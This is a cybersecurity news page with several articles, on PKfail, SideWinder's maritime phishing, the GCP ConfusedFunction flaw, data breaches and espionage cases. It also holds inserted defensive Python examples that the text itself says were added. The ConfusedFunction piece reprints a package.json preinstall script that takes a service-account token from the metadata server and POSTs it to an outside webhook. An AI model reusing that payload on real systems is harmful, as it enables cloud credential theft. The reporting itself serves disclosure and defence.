Cybersecurity News and Magazine

Secure Boot 'PKfail' Vulnerability Exposes Widespread Supply Chain Weakness

By: Alan J
26 July 2024 at 18:43

Secure Boot 'PKfail' Vulnerability

A critical security flaw dubbed 'PKfail' has exposed vulnerabilities in the Secure Boot process across hundreds of device models, uncovering a major weakness in the firmware supply chain. The flaw stems from the use of test Platform Keys (PK) in production devices, potentially allowing attackers to bypass Secure Boot protections. Secure Boot, a cornerstone of platform security, relies on cryptographic keys to verify the integrity of the boot process. However, researchers revealed that many manufacturers ship untrusted test keys provided by Independent BIOS Vendors (IBVs) instead of generating their own production keys.

Scope and Impact of PKfail

The Binarly Research team's analysis of firmware images from major device vendors revealed alarming statistics: over 10% of the firmware images in their dataset use untrusted Platform Keys, and nearly 900 device models are affected. The problem has existed in shipping devices for 12 years, from May 2012 to June 2024. The implications can be severe, as attackers who obtain the compromised private keys could bypass Secure Boot and run malicious code during the boot process. The vulnerability affects both x86 and ARM devices, making it a cross-silicon issue. In 2023, the same research team uncovered a significant supply chain security incident in which leaked Intel Boot Guard private keys, distributed by Intel in its reference code, were used in production. The team also found that the American Megatrends International (AMI) private key for the Secure Boot "master key," the Platform Key (PK), had been publicly exposed in a data leak. Devices signed with this key are still deployed in the field, and the key is also being used in recently released enterprise devices. A compromised PK allows attackers to bypass Secure Boot and run malicious code during the boot process, compromising the entire chain of trust from firmware to the operating system.

Mitigating Threat and Addressing Supply Chain

The PKfail issue highlights multiple security problems related to device supply chain security, including poor cryptographic materials management, the use of non-production cryptographic keys, and the lack of rotation of platform security cryptographic keys per product line. To mitigate these risks, device vendors must implement stronger cryptographic practices, including secure key generation and management. Users should stay vigilant for firmware updates and apply security patches promptly. The researchers have provided a free website API to check if devices are affected by PKfail.
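A first check a defender can run locally, before consulting the researchers' API, is to read the Platform Key variable from the firmware, parse the EFI_SIGNATURE_LIST it contains, and look at each X.509 certificate it holds. The example below is added here and is not code from the article or from Binarly; it uses only the Python standard library. It assumes a Linux host with efivarfs mounted, and the "DO NOT TRUST" marker string comes from public PKfail reporting about the AMI test certificates, not from this article. The SHA-256 of the DER certificate is printed so it can be compared against a vendor-published list of known test keys. The sample certificate bytes are a constructed stand-in used when no efivarfs variable is present.

```python
import hashlib
import struct
import uuid
from pathlib import Path

# GUID that marks an EFI_SIGNATURE_LIST holding X.509 certificates (UEFI spec).
EFI_CERT_X509_GUID = uuid.UUID("a5c059a1-94e4-4aa7-87b5-ab155c2bf072")
# efivarfs exposes the Platform Key as PK-<EFI_GLOBAL_VARIABLE GUID>.
EFIVARS_PK = Path("/sys/firmware/efi/efivars/PK-8be4df61-93ca-11d2-aa0d-00e098032b8c")
# Marker string in the subject of the AMI test certificates behind PKfail
# (assumption taken from public PKfail reporting, not from this article).
TEST_KEY_MARKER = b"DO NOT TRUST"
# EFI_SIGNATURE_LIST header: SignatureType, SignatureListSize, SignatureHeaderSize, SignatureSize
SIGLIST_HEADER = struct.Struct("<16sIII")


def parse_signature_lists(data: bytes):
    """Walk a chain of EFI_SIGNATURE_LIST structures and return
    (signature_type, owner_guid, signature_data) for every entry."""
    entries = []
    off = 0
    while off + SIGLIST_HEADER.size <= len(data):
        sig_type_raw, list_size, hdr_size, sig_size = SIGLIST_HEADER.unpack_from(data, off)
        end = off + list_size
        if list_size < SIGLIST_HEADER.size or end > len(data) or sig_size < 16:
            raise ValueError(f"malformed EFI_SIGNATURE_LIST at offset {off}")
        sig_type = uuid.UUID(bytes_le=sig_type_raw)
        pos = off + SIGLIST_HEADER.size + hdr_size
        while pos + sig_size <= end:
            # Each EFI_SIGNATURE_DATA entry is a 16-byte owner GUID followed by the DER certificate.
            owner = uuid.UUID(bytes_le=data[pos:pos + 16])
            entries.append((sig_type, owner, data[pos + 16:pos + sig_size]))
            pos += sig_size
        off = end
    return entries


def assess_pk(var_data: bytes):
    """Summarise every X.509 certificate in PK variable data: owner GUID, SHA-256 of the
    DER (to compare against a published list) and whether the test-key marker is present."""
    findings = []
    for sig_type, owner, cert in parse_signature_lists(var_data):
        if sig_type != EFI_CERT_X509_GUID:
            continue
        findings.append({
            "owner": str(owner),
            "sha256": hashlib.sha256(cert).hexdigest(),
            "test_key_marker": TEST_KEY_MARKER in cert,
        })
    return findings


def read_pk_variable(path: Path = EFIVARS_PK) -> bytes:
    """Read the PK variable from efivarfs; the first 4 bytes are the variable attributes."""
    return path.read_bytes()[4:]


def build_signature_list(cert_der: bytes, owner: uuid.UUID) -> bytes:
    """Encode one X.509 certificate as an EFI_SIGNATURE_LIST (used here to build test data)."""
    sig_size = 16 + len(cert_der)
    header = SIGLIST_HEADER.pack(EFI_CERT_X509_GUID.bytes_le,
                                 SIGLIST_HEADER.size + sig_size, 0, sig_size)
    return header + owner.bytes_le + cert_der


# Constructed stand-in for a DER certificate; real PK data would come from efivarfs.
SAMPLE_TEST_CERT = b"\x30\x82\x01\x00" + b"CN=DO NOT TRUST - AMI Test PK" + b"\x00" * 16
SAMPLE_OWNER = uuid.UUID("11111111-2222-3333-4444-555555555555")

if __name__ == "__main__":
    if EFIVARS_PK.exists():
        data = read_pk_variable()
    else:
        data = build_signature_list(SAMPLE_TEST_CERT, SAMPLE_OWNER)
    for f in assess_pk(data):
        verdict = "TEST KEY - do not trust" if f["test_key_marker"] else "no test-key marker"
        print(f"owner={f['owner']} sha256={f['sha256']} -> {verdict}")
```

A missing marker string is not proof of a production key: the hash comparison against a vendor list (or the researchers' API) is the authoritative check, while the marker is a quick triage signal.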

Data Breach at Rhode Island Wyatt Detention Facility Estimated to Affect 20,000

By: Alan J
26 July 2024 at 17:59

Wyatt Detention Center

A data breach at the Donald W. Wyatt Detention Facility in Central Falls, Rhode Island, has impacted nearly 20,700 people, far exceeding initial estimates, according to a class-action lawsuit filed in U.S. District Court last week. The breach, which occurred on Nov. 2, 2023, was initially reported to have affected 1,984 individuals. However, a recent letter from the facility included in the lawsuit reveals the number of victims could be as high as 20,693. Jacob Hellested, who applied for a job at the facility but never worked there, filed the lawsuit on July 19 after receiving notification of the breach eight months after it occurred.

Wyatt Detention Facility Delayed Breach Notification

The Donald W. Wyatt Detention Facility, established in 1993, was America's first publicly owned and privately operated adult secure correctional facility. The lawsuit alleges that the facility's "poor data security" led to thousands of people's personal information being posted on the dark web. This information potentially includes birthdates, phone numbers, addresses, Social Security numbers and financial data. Peter Wasylyk, Hellested's attorney, stated that the long delay in notification prevented victims from taking timely action to protect themselves. He added that the affected individuals may feel the consequences of this data breach for years to come. A letter sent to victims in July revealed that the actual number of affected individuals was significantly higher than initial estimates. According to the letter, 12,890 detainees, 185 outside vendors, and 7,618 current, former, and potential staff were affected by the breach.

Facility Response and Mitigation Efforts

The Central Falls Detention Facility Corporation, which operates the publicly owned 770-bed facility, acknowledged the cyberattack in a statement. It expressed regret for any inconvenience caused and stated that eligible individuals are entitled to receive free credit monitoring at the facility's expense. The facility has partnered with a legal services company to provide five years of free Equifax credit monitoring to those affected by the breach. However, the lawsuit argues that this response is insufficient given the potential long-term impact on victims' personal and financial well-being. The facility's attorney has declined to comment further on the matter due to the ongoing litigation. The Wyatt Detention Facility, which opened in 1993, has been used by both the U.S. Marshals Service and Immigration and Customs Enforcement.

SideWinder APT Group Targets Maritime Facilities in Possible Espionage Campaign

By: Alan J
26 July 2024 at 16:02

SideWinder Maritime Facilities

Researchers have uncovered a new campaign by SideWinder, a nation-state threat actor believed to originate from India that has been active since 2012. Analysis of phishing emails suggests the campaign is targeting ports and maritime facilities in the Indian Ocean and Mediterranean Sea. The attack's first stage implies that the group is targeting Pakistan, Egypt and Sri Lanka, while the second stage indicates additional focus on Bangladesh, Myanmar, Nepal and the Maldives. Researchers believe the campaign's goal is espionage and intelligence gathering, consistent with SideWinder's previous activities.

SideWinder Tactics, Techniques, and Procedures (TTPs)

Researchers from the BlackBerry Threat Research and Intelligence team noted that the SideWinder group has upgraded its infrastructure and tactics towards sophisticated email spear-phishing, document exploitation, and DLL side-loading techniques designed to avoid detection and deliver targeted implants. The attack chain begins with a phishing email containing a malicious document that carries highly specific logos and themes familiar to targets, often related to specific port infrastructure.

[Image: SideWinder Egypt maritime ports. Source: https://blogs.blackberry.com]

One example mimicked a letter from the Port of Alexandria, while another impersonated the Red Sea Port Authority. The documents use emotionally charged language about topics like employee termination, alleged sexual harassment incidents or salary cuts to compel victims to open attachments immediately.

[Image: SideWinder Facilities Microsoft Office. Source: https://blogs.blackberry.com]

The document analyzed by the researchers uses a remote template injection technique exploiting the CVE-2017-0199 vulnerability to gain initial access to the target's system. CVE-2017-0199, patched in 2017, is still frequently exploited by threat actors in phishing campaigns. Next, a rich text format (RTF) file is used to download an additional malicious document containing shellcode that exploits CVE-2017-11882 upon access. The shellcode also checks whether the victim's system is a real environment or a virtual machine, so that the attack chain remains undetected.

[Image: SideWinder Maritime Facilities India. Source: https://blogs.blackberry.com]

If the environment checks pass, additional JavaScript code is loaded from a remote server for execution.
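Remote template injection works because a .docx is a zip package whose word/_rels/settings.xml.rels part can declare an attachedTemplate relationship with TargetMode="External", which Word resolves at open time. That structure is what a mail gateway or triage script can look for. The example below is added here and is not code from the article or from BlackBerry; it uses only the Python standard library, and the minimal .docx it builds (with a placeholder .invalid URL) is constructed test input, not a real sample. Flagging oleObject relationships as well as attachedTemplate is a policy choice of this example.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
# Relationship types that should not point outside the package: attachedTemplate is the
# remote-template vector, oleObject the classic external-object vector (policy choice).
EXTERNAL_REL_FLAGS = ("/attachedTemplate", "/oleObject")


def find_external_relationships(docx_bytes: bytes):
    """Return every relationship in any .rels part that has TargetMode="External"
    and one of the flagged relationship types."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(part))
            except ET.ParseError:
                # A .rels part that does not parse is itself worth a look.
                findings.append({"part": part, "type": "unparseable-rels", "target": None})
                continue
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                rel_type = rel.get("Type", "")
                if rel_type.endswith(EXTERNAL_REL_FLAGS):
                    findings.append({"part": part,
                                     "type": rel_type.rsplit("/", 1)[-1],
                                     "target": rel.get("Target")})
    return findings


_W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
_MIN_DOCUMENT = ('<?xml version="1.0" encoding="UTF-8"?>'
                 f'<w:document xmlns:w="{_W_NS}"><w:body><w:p><w:r>'
                 '<w:t>Notice of termination</w:t></w:r></w:p></w:body></w:document>')


def build_sample_docx(template_url=None) -> bytes:
    """Constructed minimal .docx used as test input. With template_url set, the settings
    part carries an external attachedTemplate relationship, the structure a
    remote-template-injection document uses."""
    rels = ['<?xml version="1.0" encoding="UTF-8"?>',
            '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">']
    if template_url:
        rels.append('<Relationship Id="rId1" '
                    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
                    f'Target="{template_url}" TargetMode="External"/>')
    rels.append("</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", _MIN_DOCUMENT)
        zf.writestr("word/settings.xml", f'<?xml version="1.0"?><w:settings xmlns:w="{_W_NS}"/>')
        zf.writestr("word/_rels/settings.xml.rels", "".join(rels))
    return buf.getvalue()


if __name__ == "__main__":
    samples = (("clean", build_sample_docx()),
               ("remote template", build_sample_docx("http://template.invalid/t.dotm")))
    for label, doc in samples:
        print(label, find_external_relationships(doc))
```

In practice the same walk over .rels parts applies to .xlsx and .pptx packages, and any hit on an attachedTemplate pointing at an http(s) URL is a strong signal on its own, independent of which exploit the remote template then carries.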

SideWinder Obfuscation Techniques

The second stage of the attack chain is served through an old Tor node, used to mask online traffic and provide anonymity. However, the delivery infrastructure for the second stage can still be identified via an 8-byte file, an RTF document the C2 returns to requests coming from outside the targeted geographical area. Researchers also identified multiple domains with similar naming structures ready for use in the campaign.

Countermeasures and Conclusion

While the researchers were not able to obtain live samples of the JavaScript code delivered in the final stage of the campaign, they speculate that the goal of the operation is espionage and intelligence gathering based upon SideWinder's previous campaigns. The researchers emphasized the importance of patching systems, as SideWinder continues to exploit older vulnerabilities that have fixes available. They have also shared the following additional recommendations:
  • Organizations that rely on Microsoft Office should take special precautions to keep all systems updated, given the exploitation of CVE-2017-0199 and CVE-2017-11882 in the campaign.
  • Employees should be trained to protect against phishing campaigns.
  • Organizations should implement advanced email filtering solutions to protect against malicious phishing campaigns.
  • Organizations should invest in advanced real-time threat detection and response solutions.
The research team continues to monitor the threat actor's operations, such as its tooling and use of malicious files, for additional insight.

Florida Man Charged as Alleged Chinese Agent in Espionage Case

By: Alan J
25 July 2024 at 20:19

Ping Li Chinese Agent China Espionage Florida

A recent federal indictment accuses Ping Li, a 59-year-old resident of Wesley Chapel, Florida, of conspiring to act as an agent of the People's Republic of China (PRC) without knowledge of the Attorney General. The charges stem from his alleged cooperation with China's Ministry of State Security (MSS) over a decade-long period, during which he reportedly gathered sensitive information on various topics of interest to the Chinese government. Li faces a maximum penalty of 15 years in prison if convicted.

Allegations of Covert Activities by Ping Li

According to court documents, the PRC's Ministry of State Security (MSS) uses cooperative contacts located in countries outside of China to further its intelligence goals. These contacts assist the MSS in various ways, including conducting research on topics of interest to the PRC and providing information to the MSS. Li, a U.S. citizen who immigrated from China, allegedly worked as a cooperative contact for the MSS since at least 2012.

[Image: Ping Li espionage case, Florida. Source: www.wtsp.com]

In the indictment, Li is alleged to have worked for major U.S. tech companies while simultaneously serving as a "cooperative contact" for the MSS. Prosecutors claim he used anonymous online accounts to communicate with Chinese intelligence officers and even traveled to China for in-person meetings. The scope of Li's alleged activities is broad. He is accused of providing information on Chinese dissidents, pro-democracy activists, and practitioners of Falun Gong, a spiritual movement banned in China. Falun Gong is a controversial religion banned within China since 1999, and is not among the five religions officially recognized by the Chinese government. Its practitioners are a particular focus of the Chinese government, which has deemed the movement subversive and contrary to state interests. The charges against Li remain allegations, and the press statement includes the following disclaimer:
An indictment is merely an allegation. All defendants are presumed innocent until proven guilty beyond a reasonable doubt in a court of law.

Corporate Espionage Concerns

The indictment also raises alarms about potential corporate espionage. Li allegedly shared information about his employers, including details about a U.S. telecommunications company's operations in China and materials from an international IT firm where he later worked. In a particularly concerning allegation, Li is accused of providing Chinese intelligence with information about hacking events targeting U.S. companies, including a high-profile breach attributed to the Chinese government. This information is alleged to include materials relating to the cybersecurity training and readiness of these companies. According to the press release on the official justice.gov site, the information the MSS requested between 2012 and 2022 included:
  • In August 2012, an MSS officer requested information on practitioners of Falun Gong within the United States.
  • In March 2015, Li was asked to provide details about his U.S. telecommunications employer's branch offices in China. He reportedly complied within three weeks.
  • Two years later, in March 2017, an MSS officer requested a training instruction plan. Li allegedly uploaded the materials to a shared online account the following month, instructing the officer to delete them after review.
  • May 2021 saw a request for information on hacking incidents targeting U.S. companies, including a high-profile breach attributed to the Chinese government. Li purportedly delivered this information within four days.
  • In March 2022, Li was asked about his new employer, an international IT company, and for cybersecurity training materials. He allegedly provided this information on the same day.
  • The most recent request, in June 2022, concerned an individual who had fled China for the U.S. Li reportedly responded with information about the property owners at the suspected U.S. address.
The case remains under investigation by the FBI and illustrates the difficulty of countering suspected foreign espionage within the United States when the suspects are U.S. citizens employed as seasoned professionals.

Hong Kong Moves Toward First Cybersecurity Legislation

By: Alan J
25 July 2024 at 17:59

Hong Kong Moves Toward First Cybersecurity Legislation framework

In response to an increase in cyberattacks, Hong Kong is taking its first steps to introduce comprehensive cybersecurity legislation. The government recently unveiled a proposed framework for regulating Critical Infrastructure Operators (CIOs) and Critical Computer Systems (CCS). The proposal comes amid a wave of cybersecurity developments across Asia, including new regulations in Thailand and Singapore. Hong Kong's proposal would align with other jurisdictions that regulate critical infrastructure, such as mainland China, Australia, and the United States.

Key Elements of the Proposed Hong Kong Cybersecurity Framework

The proposed framework is designed to ensure that CIOs and CCS operate in a secure and reliable manner. A new Commissioner's Office, to be set up under the Security Bureau, will oversee the implementation of these regulations. This office will have the power to investigate incidents, issue guidelines, and conduct inspections. The key elements of the framework include:
  • Scope of Application: The framework applies to CIOs and CCS, which are defined as organizations that own, control, or use critical computer systems. The initial eight Designated Sectors include energy, information technology, banking and financial services, land transport, air transport, maritime, healthcare services, and communications and broadcasting.
  • Obligations: CIOs will be required to maintain an address and office in Hong Kong, establish a dedicated cybersecurity team, update the Commissioner's Office on material changes to CCS, and conduct regular security audits and risk assessments. They will also be required to participate in security drills and submit emergency response plans.
CIOs will face three main categories of obligations:
  • Organizational: Maintain a Hong Kong office and establish a dedicated cybersecurity team.
  • Preventive: Submit security management plans and conduct regular risk assessments and audits.
  • Incident Reporting and Response: Participate in security drills and notify authorities of incidents within specified timeframes.

Comparison with Other Jurisdictions

The proposed framework shares similarities with existing cybersecurity regulations in Singapore and China. For instance, both jurisdictions require CIOs to conduct regular security risk assessments and audits. However, there are also some key differences, such as the frequency and timing of security drills and incident reporting.

[Image: Hong Kong Cybersecurity Legislation. Source: www.mayerbrown.com]

Challenges, Uncertainties and Unresolved Questions

While the proposed framework provides a comprehensive approach to cybersecurity, there are still some unresolved issues, and many questions have been raised about the new legislation:
  • Compliance Timeline: Organizations may have only six months to implement required measures after being designated as CIOs or CCSs. This could prove challenging, especially for larger entities that require more time for organizational changes.
  • Sector Definitions: There's uncertainty about which organizations will fall under certain designated sectors, particularly the "information technology" category.
  • Third-Party Providers: The framework's impact on service providers to CIOs remains unclear, as some may themselves be designated as critical infrastructure operators.
  • Talent Shortage: Stakeholders have expressed concerns about the difficulty of hiring competent cybersecurity personnel to meet the new requirements.
The government plans to introduce a bill by the end of 2024, with the legislation expected to come into force in late 2025 or mid-2026 at the latest. As Hong Kong moves forward with this initiative, balancing security needs with operational feasibility will be crucial for its success.

ConfusedFunction Vulnerability Found in Google Cloud Platform – Protect Your Accounts

By: Alan J
25 July 2024 at 14:45

ConfusedFunction Vulnerability Google Cloud Platform

Researchers have discovered a vulnerability in the Google Cloud Platform (GCP) dubbed "ConfusedFunction" that affects Cloud Functions, a serverless execution environment, and Cloud Build, a CI/CD pipeline service within the platform.

ConfusedFunction Vulnerability

The vulnerability arises from the automatic attachment of a default Cloud Build service account, granted excessive permissions, to Cloud Build instances that are created during Cloud Function deployment. This process happens behind the scenes and is unknown to most Google Cloud Platform users.

[Image: Google Cloud Platform ConfusedFunction vulnerability. Source: tenable.com/blog]

Tenable researchers discovered that an attacker could exploit the deployment stage by creating or updating a Cloud Function with malicious code. During deployment, the malicious code can leverage the attached service account's permissions to gain unauthorized access to other Google Cloud Platform services like Cloud Storage, Artifact Registry, or Container Registry. The researchers have shared the following steps to reproduce the attack technique through a Node.js function runtime:
  • Run npm init.
  • A package will be created in the current folder; modify its package.json to contain the webhook attack script.
    { "name": "mypocmaliciouspackage", "version": "4.0.0","description": "poc", "main": "index.js", "scripts": {"test": "echo 'testa'", "preinstall": "access_token=$(curl -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/134567893333@cloudbuild.gserviceaccount.com/token');curl -X POST -d $access_token https://webhook.com"}, "author": "me", "license": "ISC" }
  • Run npm publish --scope public command to push the code; the researchers caution that this code would be published to the public npm registry.
  • Create a new Cloud Function or update an existing one with an identity that has adequate function permissions.
  • Pick a Node.js runtime and edit the package.json with the malicious package.
    { "dependencies": { "@google-cloud/functions-framework": "^3.0.0", "mypocmaliciouspackage": "^1.0.0" } }
  • Deploy and run the Cloud Function; the Cloud Build instance will then run with the malicious package installed, and the package's preinstall script will exfiltrate the token of the default Cloud Build service account to the webhook.

What Google's ConfusedFunction Fix Covers

After the researchers reported the ConfusedFunction vulnerability to Google, Google Cloud Platform confirmed its existence and remediated the flaw to some extent for Cloud Build accounts created after mid-June 2024. However, these remediation efforts do not address existing Cloud Build instances.

[Image: Google Cloud Functions ConfusedFunction vulnerability. Source: tenable.com/blog]

The ConfusedFunction vulnerability highlights the problematic scenarios that may arise due to software complexity and inter-service communication in a cloud provider's services. To support and allow backward compatibility, Google Cloud Platform has not changed the privileges of Cloud Build service accounts created before the fix was implemented. This means that the vulnerability still affects existing instances. It's also worth mentioning that while the Google Cloud Platform fix has reduced the severity of the problem for future deployments, it didn't completely eliminate it. That's because the deployment of a Cloud Function still triggers the creation of the aforementioned Google Cloud Platform services. As a result, users must still assign minimum but still relatively broad permissions to the Cloud Build service account as part of a function's deployment.

Patch and Mitigation Strategies

Google Cloud Platform has implemented a partial fix by allowing users to choose a custom service account with limited permissions for the Cloud Build instance during deployment. This enhances security compared to the previous automatic assignment of the default service account. Here's how to mitigate the risk:
  • Upgrade Cloud Functions: Ensure you're using the latest version of Cloud Functions to benefit from the fix.
  • Custom Service Accounts: For existing Cloud Functions, consider replacing the legacy Cloud Build service account with a custom one with minimal necessary permissions.
  • Monitor Permissions: Regularly review and adjust IAM permissions for Cloud Functions and Cloud Build instances to minimize potential attack surfaces.
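The "Monitor Permissions" step can be partly automated offline: export the project IAM policy once (for example with `gcloud projects get-iam-policy PROJECT_ID --format=json`) and look for every role still bound to the default Cloud Build service account, whose member form (`PROJECT_NUMBER@cloudbuild.gserviceaccount.com`) matches the account named in the researchers' reproduction steps above. The example below is added here and is not code from the article or from Tenable or Google; which roles count as "too broad" for a build identity is a policy choice of this example, and the sample policy, project number and e-mail addresses are constructed placeholders.

```python
import json
import re
import sys

# Member form of a project's default Cloud Build service account.
DEFAULT_BUILD_SA = re.compile(r"^serviceAccount:(\d+)@cloudbuild\.gserviceaccount\.com$")
# Roles this example treats as too broad for an identity attached to every function build
# (policy choice: the legacy builder role, primitive roles, and any *.admin role).
BROAD_ROLES = {"roles/owner", "roles/editor", "roles/cloudbuild.builds.builder"}


def is_broad(role: str) -> bool:
    return role in BROAD_ROLES or role.endswith(".admin")


def audit_build_service_account(policy: dict):
    """Inspect a project IAM policy (the JSON emitted by
    `gcloud projects get-iam-policy --format=json`) and report every role bound
    to the default Cloud Build service account."""
    findings = []
    for binding in policy.get("bindings", []):
        role = binding.get("role", "")
        for member in binding.get("members", []):
            match = DEFAULT_BUILD_SA.match(member)
            if not match:
                continue
            findings.append({
                "project_number": match.group(1),
                "role": role,
                "broad": is_broad(role),
                # A conditional binding still deserves review, but note it separately.
                "conditional": "condition" in binding,
            })
    return findings


def summarize(findings):
    """Reduce the findings to what a reviewer wants: how many roles, which are broad."""
    broad = sorted(f["role"] for f in findings if f["broad"])
    return {"roles": len(findings), "broad_roles": broad, "needs_attention": bool(broad)}


# Constructed sample policy; the project number and accounts are placeholders.
SAMPLE_POLICY = json.loads("""
{
  "bindings": [
    {"role": "roles/cloudbuild.builds.builder",
     "members": ["serviceAccount:000000000000@cloudbuild.gserviceaccount.com"]},
    {"role": "roles/storage.admin",
     "members": ["serviceAccount:000000000000@cloudbuild.gserviceaccount.com",
                 "user:alice@example.com"]},
    {"role": "roles/logging.logWriter",
     "members": ["serviceAccount:fn-build@example-project.iam.gserviceaccount.com"]}
  ],
  "etag": "BwXYZ=",
  "version": 1
}
""")

if __name__ == "__main__":
    # Usage: python audit_build_sa.py [policy.json]; falls back to the constructed sample.
    policy = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_POLICY
    findings = audit_build_service_account(policy)
    for f in findings:
        flag = "BROAD" if f["broad"] else "ok"
        print(f"{f['role']:<40} {flag}{' (conditional)' if f['conditional'] else ''}")
    print(summarize(findings))
```

A clean result here only covers project-level bindings; bucket- or repository-level policies that grant the same account access must be exported and checked the same way, and existing functions should be redeployed with the custom, narrowly scoped build service account the fix makes available.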

Philippines Shuts Down Online Gambling In Effort to Curb Financial Scamming

By: Alan J
24 July 2024 at 19:24

Philippine Offshore Gaming Operators (POGOs) gambling

In a bold move to address the country's growing concerns, President Ferdinand Marcos Jr. has announced a total ban on Philippine Offshore Gaming Operators (POGOs) in the Philippines. This decision comes after years of controversy and allegations of illegal activities linked to POGOs. In his third State of the Nation Address (SONA), Marcos emphasized the need to stop the "grave abuse and disrespect to our system of laws" and to put an end to the "panggulo" (nonsense) that has plagued the country. He also directed the Philippine Amusement and Gaming Corporation (PAGCOR) to wind down and cease POGO operations by the end of the year.

Philippines Government Helps Displaced Employees

As the ban takes effect, the Philippine government has vowed to help Filipino POGO workers find new jobs. Finance Secretary Ralph Recto assured that the government would assist Filipino POGO workers in finding new employment. "We have until the end of the year to ensure that all displaced Filipino workers will have new jobs," Recto said. He added that the Department of Finance would collaborate with the Department of Labor and Employment to provide reskilling and upskilling training.

[Image: Philippines shuts down gambling POGOs, President Marcos. Source: pco.gov.ph]

National Economic and Development Authority Secretary Arsenio Balisacan downplayed the economic impact of the ban, noting that POGOs contributed less than 0.5% to the country's GDP in 2022. He emphasized that the social and reputational costs of hosting POGOs outweigh their economic benefits. Other government agencies, such as the Department of Social Welfare and Development (DSWD) and the Department of Labor and Employment (DOLE), have also pledged to provide assistance to affected workers. The DSWD has indicated its desire to convert shut-down POGO hubs into shelters for individuals reached by its outreach programs.

Addressing Social Concerns and Illegal Activities

The Department of the Interior and Local Government (DILG) has directed local government units (LGUs) to scrutinize the documents of establishments as the first line of defense in granting business permits. Interior Secretary Benjamin Abalos Jr. has also emphasized the importance of coordination with the proper authorities to ensure that only legitimate businesses are allowed to operate, and has directed LGUs to scrutinize business permit applications more closely to prevent illegal operations from continuing under different guises. The ban comes in response to numerous reports of criminal activities linked to POGOs, including financial scams, money laundering, human trafficking and violent crimes. Marcos acknowledged that while the ban would solve many problems, it wouldn't address all issues. Department of Social Welfare and Development Secretary Rex Gatchalian outlined plans to assist both Filipino and foreign workers affected by the ban. The government will provide temporary housing, cash aid and support for those wishing to start small businesses. As the Philippines moves to implement this significant policy change, the government faces the challenge of balancing economic considerations with social welfare and national security concerns.

Stolen Documents From Pentagon IT Provider Leidos Leaked By Hackers

By: Alan J
24 July 2024 at 18:46

Pentagon IT Provider Leidos

Hackers have leaked internal documents stolen from Leidos Holdings Inc., a major U.S. government IT services provider, according to a source familiar with the situation. The company recently discovered the issue and believes the documents were taken during a previously disclosed breach of a third-party system it used. Leidos, which serves clients including the Defense Department, Department of Homeland Security and NASA, is investigating the matter. The company's stock initially fell more than 4% in after-hours trading on the news before recovering most of its losses.

Leidos Leak Believed to Stem From Third-Party Breach

Leidos, formed in 2013 through the acquisition of Lockheed Martin Corp.'s IT business, was the largest federal IT contractor in the 2022 fiscal year, with $3.98 billion in contract obligations, according to Bloomberg Government data. The leaked documents are believed to have originated from a breach of a Diligent Corp. subsidiary, Steele Compliance Solutions. Leidos used Diligent's system to store information from internal investigations, as noted in a June 2023 Massachusetts filing. While some purportedly leaked files were visible on a cybercrime forum, their authenticity could not be independently verified. Though the original report does not directly mention the name of the cybercrime forum, it appears to be BreachForums.

[Image: Pentagon IT provider Leidos. Source: BreachForums.st]

[Image: Pentagon IT provider Leidos. Source: BreachForums.st]

A Diligent spokesperson confirmed that the leak appears to stem from a 2022 hack affecting Steele Compliance Solutions, which it acquired in 2021. The incident impacted fewer than 15 customers, including Leidos, which was initially notified in November 2022. "We promptly notified impacted customers and took immediate corrective action to contain the incident," the Diligent spokesperson said. Leidos maintains that the breach did not affect its network or any sensitive customer data. "We have confirmed that this stems from a previous incident affecting a third-party vendor for which all necessary notifications were made in 2023," a Leidos spokesperson stated.

Leidos Leak Impact and Implications

The company's extensive government contracts and the nature of the leaked documents raise concerns about potential security implications. However, the full extent of the breach and the sensitivity of the leaked information remain unclear. The company has sought to reassure its customers, including the Defense Department, the Department of Homeland Security, and NASA, that the breach did not affect its network or sensitive customer data. According to the Bloomberg article, the Pentagon, Department of Homeland Security and NASA had not yet responded to requests for comment on the incident. In another incident more than a decade ago, hackers stole over 24,000 files from a defense contractor associated with the Pentagon. While the Pentagon did not say which files had been stolen, given the level of secrecy attached to their content, former Deputy Defense Secretary William J. Lynn III acknowledged during a speech that it involved some of the U.S.'s "most sensitive systems, including aircraft avionics, surveillance technologies."

Strategic Insights: The Importance of Dark Web Monitoring for CEOs

By: Alan J
24 July 2024 at 14:18

Importance of Dark Web Monitoring for CEOs

Security experts have stressed the importance of dark web monitoring for CEOs of businesses and enterprises of all sizes as an essential measure to prioritize the safety and integrity of their organization's digital presence. Password and data breaches shared on the dark web and in cybercriminal communities have become a common occurrence, leaving businesses vulnerable to severe consequences, including stolen bank accounts and identity theft. To combat this threat, dark web monitoring is a proactive option to help identify, detect and mitigate potential breaches before they escalate into embarrassing major security incidents.

CEOs Guide to Dark Web Monitoring

The dark web is a small part of the deep web, which is generally considered an unindexed sub-layer of the internet, ignored by or inaccessible to conventional search engines. This anonymous environment is a hub for illegal activities, including the commission and sale of sensitive data such as digital credentials and records. Dark web monitoring is a specialized process that involves searching for and monitoring the spread of records related to an organization's or entity's information across the dark web. Using advanced algorithms and techniques, dark web monitoring tools provide enhanced detection capabilities, allowing businesses to stay ahead of cyber threats.

The financial implications of a cyber attack can be severe. In 2020, for example, DSG Retail Limited was fined £500,000 by the UK's Information Commissioner's Office after a point-of-sale system breach affected 14 million people. A study conducted at King's College London revealed that over 60% of more than 2,700 darknet sites were found to host illicit content facilitating criminal activity. It's essential for CEOs to understand the techniques and methods cybercriminals use to steal data, such as phishing, malware, and keylogging, to recognize and prevent these threats.

